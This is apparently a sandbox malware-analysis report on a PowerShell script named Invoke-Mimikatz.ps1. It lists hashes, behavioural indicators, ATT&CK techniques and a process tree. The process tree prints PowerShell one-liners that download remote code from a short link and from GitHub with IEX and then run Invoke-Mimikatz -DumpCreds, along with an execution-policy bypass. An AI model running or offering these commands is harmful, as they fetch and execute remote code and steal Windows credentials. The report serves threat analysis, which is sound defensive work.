1b441fde04d361a6fd7fbd83e969014622453c263107ce2bed87ad0bff7cf13f

Analysis

max time kernel
300s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29-04-2024 12:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoke-Mimikatz.ps1
Size

661KB
MD5

a09639208ce794ec515a1f04346fc5ef
SHA1

3d57d4a3e4f614aca0bb208fb11f0c673b3e45cb
SHA256

1b441fde04d361a6fd7fbd83e969014622453c263107ce2bed87ad0bff7cf13f
SHA512

b2b4b71dc8b641bbd2578aa4ac38f8c9b7d89f47e76eec74ab41db17a4356b802fb503513e89c5dbf91fef829035851e8685a4567d3356148b81a32fdc40b7ba
SSDEEP

12288:JjyAZ12f9O2Bc8kzpCVYrD6ABwr7uiIN//eFU01Ylbixxn76kjmukmCKZrAiEz6C:JjZ12fhqJNuFUHbiHn76km

Score

8^/10

microsoft phishing

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
72	504	powershell.exe
176	4748	powershell.exe
191	5104	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
190	raw.githubusercontent.com
191	raw.githubusercontent.com

Detected potential entity reuse from brand microsoft.
phishing microsoft

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133588673018367888"	chrome.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2872	powershell.exe
2872	powershell.exe
2872	powershell.exe
3104	chrome.exe
3104	chrome.exe
504	powershell.exe
504	powershell.exe
504	powershell.exe
504	powershell.exe
2620	powershell.exe
2620	powershell.exe
2620	powershell.exe
2620	powershell.exe
2620	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
3828	chrome.exe
3828	chrome.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe
Token: SeCreatePagefilePrivilege	3104	chrome.exe
Token: SeShutdownPrivilege	3104	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe
3104	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3104 wrote to memory of 1680	3104	chrome.exe	76
PID 3104 wrote to memory of 1680	3104	chrome.exe	76
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 4912	3104	chrome.exe	78
PID 3104 wrote to memory of 1936	3104	chrome.exe	79
PID 3104 wrote to memory of 1936	3104	chrome.exe	79
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80
PID 3104 wrote to memory of 1016	3104	chrome.exe	80

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Invoke-Mimikatz.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ffc13179758,0x7ffc13179768,0x7ffc13179778
  2⤵
  PID:1680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:2
  2⤵
  PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2880 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4512 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:2248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:1360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:4648
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff776217688,0x7ff776217698,0x7ff7762176a8
    3⤵
    PID:2908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5380 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3792 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4756 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5952 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:4708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5912 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5628 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:8
  2⤵
  PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5640 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3232 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:3828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=1192 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2972 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6048 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5264 --field-trial-handle=1868,i,8131954881639075407,12134761574390899530,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3828

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3124

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:4660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1qMn59d'); Invoke-Mimikatz -DumpCreds"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy Unrestricted
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1qMn59d'); Invoke-Mimikatz -DumpCreds"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:4748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:5104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

Filesize
200KB

MD5
a484f2f3418f65b8214cbcd3e4a31057

SHA1
5c002c51b67db40f88b6895a5d5caa67608a65ce

SHA256
79cbe928773386d07f0127f256f383debed5ccea5ff230465bf46ec7c87319d6

SHA512
0be1bb8db08f6e6041a85cfee90cd36a5b595afbca34d52a125465454fc806b4bb7ae569eaf4c882922fb1b962b6060534e597791cd0ad23483be5981d9be85c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
afdfd794e0a003d2a04408b2ba4ef218

SHA1
1646dd3fdf92f8fa4ccd84f502434240eae810ff

SHA256
7ec2454741d75b4b95a11e45110270d3454dd02d0e1506bc8647886999f4be24

SHA512
8fd615b298e7934dbf6e2147b77bebb0b256fc0842bc8700a6bf226857192bdb3fc0b289d36405090c48c3a7f3f88365c1472e44a21d274e62cf1683f887d7e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
953174880f111ebc3e7c805ffba9c24b

SHA1
66ea04d6ffc72f4a954af32afce1a87ad27b5548

SHA256
888215b89226adf5e5bafdd14c9326fdead6cc701e99077d099aa3d810562e41

SHA512
e56ed973025d239db3c069342a22449c45e7df7958b6b7bc5b3d432c0f1fcfe71bc6c703ed9c56684c50e325c5247d898aa7fc1c21d4c031b11c9ae7e1006420

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\8f9fed72-b9c4-4ff2-b6d5-3bbee3d7e9b4.tmp

Filesize
2KB

MD5
64a9e0ea588c7629e67715cece69c6d2

SHA1
9151070156c88aa39ba28e8d843b50a03498d1d6

SHA256
45018dce83d82d4c60d0e1c794418c50fd3bd8a04acae25540a2dbdaa73a4eb0

SHA512
c0f20365c69fe16e6e6e84a4c91b9cefdf4476a88196f975c0cbc5d7341bb951b8577d1c59b357286459f4c436174823c03e872f0ca5491d36b39d884cd0bcd3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
31076b3596b935a0755b6b16c371e099

SHA1
09a15522439702e9bf502273414783d4e4ecced7

SHA256
df4d2bb5e0585b00b10bffc9ca8eafcf8d4cbd7a46d4fde4cfac58132df15c0b

SHA512
273972c1b86c2c2b7663ec98e30f73db3c04bf765059a2e8d4e360e0c565dd59e4c588b6614c4426b2a536a85797ec3ba14d92ef4de7a7c5efcaa7df7fe1f39c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
c22f91e3f7f709d068136ea23d350413

SHA1
e591119d2cd83f83e9ee96176014f01efed0c777

SHA256
a818c62acb5a8d3518b3d7284bc5941c3312a32d9611f718010671571d4f9732

SHA512
ef59a92d940ca7449d7b835e5560c330830cea2629bc24b9cf441a45c642ac038e2b378f13212aeaada549bf60c489ab6236581c3d8a77558be3264817a98be6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
684628d1a9822a90fd0f8e0567b5809c

SHA1
45b6aa2311b44d45fb9edd11e79692286e497ad7

SHA256
beea5286e1c5029af5f40db760206adf1fd67f5bf842d5e8175e9b7e6cb57a1d

SHA512
fd95e5ad2e4f846a3ebedf9bb7e77c4844516bef1304b60fcf9e1bfc9a14f3fddd04de7edec0abbfff477447fb151c1cb40059fd330ff402cb09c293468e4a1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4ebda68a5b7ab2c660612ba10b6c82ae

SHA1
34b059354b0c68e6ba6e6d491ec2df86d0a36456

SHA256
92a5efed6e559069cf4b2d0897c364c9cad2010e3a3d3ae1cfe7f0a5fb7d7d61

SHA512
ebc373559db199e9a585338f5e330c96a7b5b84c13aea1b62e2fbf9788a3d87522e6e40d3b3b1aef1db22bb753f7ffa6f4b2076e36f4962f798b432319fe4859

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
f5a821e2c9175a2350727958b9a25df0

SHA1
bba811765d7523d6f08ad4387c727e76e110e9bd

SHA256
09ed5e710589d922b6e96d5f090f2765b1fef37d3e7fa004e8b3be327a8d0961

SHA512
9cf486e26b3b8db227f2a1927833d5acc199f04f741c901eaa33545cd81cd75476f16524e02dfe1e2f36ef28adcb3cd6a4543712cd5c6102a2ef7dd68a94fe5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

